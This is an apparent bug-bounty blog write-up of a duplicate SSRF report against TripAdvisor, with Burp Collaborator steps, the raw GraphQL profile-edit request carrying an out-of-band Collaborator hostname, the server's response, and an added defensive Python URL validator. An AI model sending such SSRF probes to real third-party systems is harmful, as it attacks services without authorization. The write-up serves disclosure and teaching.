Server-Side Request Forgery (SSRF)
2021-08-30 02:26:15 Author: infosecwriteups.com

What is SSRF?!

Server-Side Request Forgery (SSRF) is a vulnerability used to attack internal systems that sit behind firewalls and are not reachable from external networks. Through SSRF an attacker can reach internally running services such as SSH, services bound to localhost, FTP, and others. A typical SSRF scenario forces the vulnerable server to open a connection to internal-only services within the organization’s infrastructure.

Intro:

Testing TripAdvisor for vulnerabilities and bugs, I found that it was vulnerable to SSRF. I found this vulnerability using the Burp Suite feature Collaborator. What is Burp Collaborator? Burp Collaborator is a network service that Burp Suite uses to help discover many kinds of vulnerabilities. For example, some injection-based vulnerabilities can be detected using payloads that trigger an interaction with an external system when successful injection occurs.

This Is How I Did It:

1. Open Burp Suite > Burp menu > Burp Collaborator client and select “Burp Collaborator client”.
2. Click where it says “Copy to clipboard”; this will copy the payload needed to exploit the web app, e.g. `jhggfwo94wu094ctrtrstwrvterwt0tvwg.burpcollaborator.net`.
3. Paste the Collaborator client payload into the website field as shown below and forward the request.
4. Use the “Poll now” function to retrieve details of any network interactions resulting from the payload.
5. Wait for the magic to happen.

The HTTP Request:

POST /data/graphql/batched HTTP/1.1
Host: www.tripadvisor.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json
Origin: https://www.tripadvisor.com
Content-Length: 1520
Connection: close

[{"operationName":"EditProfile","variables":{"userId":"9A9A11C7013E070C233A82C19CC97D78","displayName":null,"username":null,"bio":null,"hometown":null,"website":"e3i57wj14co4lyphm5kwqx8xjoped3.burpcollaborator.net","acceptedToU":true}]

The HTTP Response:

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DSP COR CAO PSA IDC ADM DEVi TAIi PSD IVAi IVDi CONi HIS CNT"
Cache-Control: no-cache, no-store, must-revalidate
Timing-Allow-Origin: https://www.tripadvisor.com
Vary: Accept-Encoding
Content-Length: 2089
Content-Type: application/json
Date: Mon, 21 Sep 2020 17:54:47 GMT
Connection: close

[{"data":{"updateMemberProfile":{"statuses":["OK"],"memberProfile":{"userId":"9A9A11C70C97D78","avatar":{"id":********,"photoSizes":[{"url":"https://dynamic-media-cdn.tripadvisor.com/media/photo-o/1a/f6/e7/99/default-avatar-2020-57.jpg?w=100&h=100&s=1","width":0,"height":0,"__typename":"PhotoSize"},{"url":"https://media-cdn.tripadvisor.com/media/photo-t/99/default-avatar-2021-75.jpg"}]

Collaborator Response:

The Report:

Here comes the interesting part of this article.

As soon I saw those logs, I told myself “Yes, I’m Rich!”. Uh well, not really. By reading their response, you can tell I got happy too soon. Someone else years ago sent in the same report. Their response caught me off guard because this was not an easy find. The exploit was only possible by carefully examining every single response/request from the web app in order to find a field to add your payload and hope for a response.
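The Collaborator hit shows the server connecting to whatever hostname is placed in the profile’s website field. The defender’s counterpart is to vet that value before anything is fetched. The code below is an added example, not TripAdvisor’s code and not from the original post: it requires http/https (so a bare hostname like the payload above is rejected), refuses embedded credentials, resolves the host and rejects any answer that is not a public address, and returns the resolved addresses so the fetcher can pin to them instead of resolving a second time. `FAKE_DNS` and `fake_resolver` are constructed stand-ins so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit
ALLOWED_SCHEMES = {"http", "https"}
def resolve_all(hostname):
    """Live DNS: every IPv4/IPv6 address the name maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})

def is_public_address(ip):
    """True only for globally routable unicast addresses."""
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local
                or a.is_multicast or a.is_reserved or a.is_unspecified)

def validate_website_url(url, resolver=resolve_all):
    """Vet a user-supplied URL before the server fetches it -> (accepted, reason, pinned_ips)."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False, "malformed URL", []
    if parts.scheme.lower() not in ALLOWED_SCHEMES:   # bare hostnames fail here
        return False, "scheme not allowed", []
    if not parts.hostname:
        return False, "missing host", []
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL", []
    try:
        ips = resolver(parts.hostname)
    except (OSError, ValueError):
        return False, "unresolvable host", []
    bad = [ip for ip in ips if not is_public_address(ip)]
    if not ips or bad:   # one bad answer is enough: rebinding mixes them
        return False, f"non-public address(es): {bad}", []
    # Callers must connect to pinned_ips directly (no second DNS lookup)
    # and must re-run this check on every redirect they choose to follow.
    return True, "ok", ips

# Constructed name table so the example runs offline; not real DNS data.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "internal.corp.local": ["10.0.0.5"],
    "rebind.example.invalid": ["93.184.216.50", "127.0.0.1"],
}

def fake_resolver(hostname):
    try:
        return [str(ipaddress.ip_address(hostname))]   # IP literal: no lookup
    except ValueError:
        if hostname in FAKE_DNS:
            return FAKE_DNS[hostname]
        raise OSError("NXDOMAIN")
```

In production pass no resolver argument so `resolve_all` does the live lookup; the validation alone does not help if the fetch that follows resolves the name again or follows redirects unchecked.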

The Reward:

[Image: reward]

Looking at the photo above, you can see the outcome of this report. I have to be honest, getting 1 point as a “reward” was not what I was aiming for when I sent this report. But hey something is better than nothing, isn’t it?!

Summary

Although I didn’t get any awards for my work, something good came out of it: experience. Now I know what endpoints to exploit and with or for what. Never let this type of outcome discourage you. Duplicates mean that you did something of value, you just did it after someone else, but you did it.


Source: https://infosecwriteups.com/server-side-request-forgery-ssrf-8e0fa290f7e6?source=rss----7b722bfd1b8d--bug_bounty